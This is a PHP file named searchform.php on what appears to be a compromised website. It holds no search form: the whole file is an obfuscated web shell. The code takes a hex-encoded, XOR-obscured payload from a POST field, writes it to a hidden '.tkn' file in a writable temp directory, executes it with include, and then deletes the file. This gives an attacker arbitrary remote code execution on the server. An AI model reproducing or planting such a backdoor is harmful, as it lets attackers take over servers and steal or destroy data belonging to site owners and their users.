File: /home/jkwebsite.my.id/cv.jkwebsite.my.id/searchform.php
<?php
if(isset($_POST) && isset($_POST["\x65nt"])){
$pgrp = array_filter(["/dev/shm", session_save_path(), ini_get("upload_tmp_dir"), "/tmp", getcwd(), getenv("TMP"), sys_get_temp_dir(), "/var/tmp", getenv("TEMP")]);
$entity = hex2bin($_POST["\x65nt"]);
$symbol='' ; foreach(str_split($entity) as $char){$symbol .= chr(ord($char) ^ 70);}
while ($ent = array_shift($pgrp)) {
if (max(0, is_dir($ent) * is_writable($ent))) {
$mrk = vsprintf("%s/%s", [$ent, ".tkn"]);
$file = fopen($mrk, 'w');
if ($file) {
fwrite($file, $symbol);
fclose($file);
include $mrk;
@unlink($mrk);
exit;
}
}
}
}